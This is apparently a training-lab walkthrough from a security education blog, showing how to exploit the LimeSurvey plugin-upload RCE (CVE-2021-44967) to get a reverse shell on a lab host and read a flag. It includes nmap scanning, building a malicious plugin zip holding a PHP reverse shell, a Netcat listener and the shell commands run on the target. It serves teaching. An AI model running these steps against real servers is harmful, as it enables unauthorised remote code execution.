Lab Walkthrough — LimeSurvey RCE [CVE-2021–44967]

Pentester Academy
Pentester Academy Blog
7 min readApr 5, 2023


In our lab walkthrough series, we go through selected lab exercises on our INE Platform. or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

This exercise is to understand how to exploit the LimeSurvey application.

Purpose: We are learning how to exploit the LimeSurvey application’s vulnerable version using the Python script and a manual method.

Technical difficulty: Beginner


As noted on the project’s GitHub page:

Limesurvey is the number one open-source survey software. Advanced features like branching and multiple question types make it a valuable partner for survey-creation.

In this lab, we will learn how to exploit the authenticated remote code execution vulnerability (CVE-2021–44967) in the LimeSurvey application by uploading a malicious plugin containing arbitrary PHP code.

Lab Environment

In this lab environment, the user is going to get access to a Kali GUI instance. A vulnerable instance of the LimeSurvey application is hosted on the target server. It can be accessed using the tools installed on Kali at http://demo.ine.local.

Objective: Leverage the plugin upload functionality to obtain code execution on the target server and retrieve the flag.

Challenge Link:

User Information

Use the following credentials to access LimeSurvey’s admin panel:

Username: admin

Password: password


The best tools for this lab are:

  • cURL
  • Netcat
  • Nmap
  • Python
  • Zip
  • A web browser

Step 1: Open the lab link to access the Kali GUI instance.

Step 2: Check open ports on the provided machine.


nmap -sS -sV demo.ine.local

The Apache web server is running on port 80 on the target server.

Step 3: Check the web application server by the Apache server.

Open the following URL in the web browser: http://demo.ine.local

LimeSurvey web application is hosted on the target server.

As noted on the project’s GitHub page:

Limesurvey is the number one open-source survey software. Advanced features like branching and multiple question types make it a valuable partner for survey-creation.

Open the /admin page: http://demo.ine.local/admin

You should get the login page.

Login using the provided credentials:

Username: admin

Password: password

We were successfully able to log in:

Step 4: Explore the plugins page.

Click on Configuration -> Plugins:

You should notice all the available plugins:

Click on Upload & install:

You can upload a Zip plugin file through the provided web application.

Step 5: Search for CVE-2021–44967.

Search Query:

LimeSurvey CVE-2021–44967

Open the CVE Mitre link:


A Remote Code Execution (RCE) vulnerability exists in LimeSurvey 5.2.4 via the upload and install plugins function, which could let a remote malicious user upload an arbitrary PHP code file.

Open the following link mentioned in the references:


This project is available in the Kali GUI instance, in the /root/Desktop/challenge-files directory:


ls -al /root/Desktop/challenge-files/

ls -al /root/Desktop/challenge-files/Limesurvey-RCE/

Step 6: Inspect and modify the provided exploit files.

List the contents of the file:


cd /root/Desktop/challenge-files/Limesurvey-RCE/


unzip -t

Check the contents of the php-rev.php file:


cat php-rev.php

We have to change the lines highlighted in the above image; that is, we need to provide the IP and port of the attacker machine where the Netcat listener would be running.

Also, notice the shell command that gets executed on the target machine:

Shell Commands:

uname -a; w; id; /bin/sh -i

To place the IP address in the PHP reverse shell, we have to find the IP address of the attacker machine:


ip addr

The IP address of the attacker machine is

Place the IP address of the attacker machine ( and the port (54321) in the PHP reverse shell.


head php-rev.php

Find the CHANGE THIS words in the file:


grep -n -C3 ‘CHANGE THIS’

There are three potential places we have to make the change.


Create the file again:


zip -r config.xml php-rev.php

unzip -t

Now we have the payload plugin (zip file) with a PHP reverse shell.

Step 7: Upload the plugin zip file.

Navigate to the web app and upload the plugin zip file (

Confirm the uploaded plugin:

Click on the Install button:

The malicious plugin containing the PHP reverse shell was successfully installed.

To use this plugin, it has to be activated. That would be done by the exploit script provided in the challenge files.

Before proceeding with the exploitation, we need to find the plugin id. Locate the uploaded plugin:

Hover over the plugin’s entry:

Notice the link highlighted in the above image. It indicates the plugin id is 18.

Now we have the path to the plugin zip file and the plugin id. Make those changes in the file:


grep -n -C3 ‘CHANGE THIS’

Check the usage of the exploit script:



Start a Netcat listener in another terminal window:


nc -lvp 54321

Run the following command to exploit the target web app:


python3 http://demo.ine.local admin password 80

Exploitation was successful. Check the terminal where the Netcat listener was running:

We have received a shell session from the target server. The output of the following commands is shown in the Netcat window:

  • uname -a
  • w
  • id

Step 8: Retrieve the flag from the target server.


Now that we have the shell session on the target server, we can execute OS commands on the server.

Listing the files present in the current working directory:


ls -al

Locating the flag file:


find / -iname *flag* 2>/dev/null

The flag is present in the /tmp/FLAG.txt file:


cat /tmp/FLAG.txt

FLAG: 5cd43944938b4766026a8a77c08a28a7

With that, we conclude this lab, covering an authenticated remote code execution vulnerability in LimeSurvey. We could leverage CVE-2021–44967 by uploading a malicious plugin containing the reverse shell that provided us a reverse shell on the target server. Thus, we could perform a privilege escalation and access the underlying server starting with the admin access to the LimeSurvey web application!


Try this exploit for yourself! or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

Originally published at

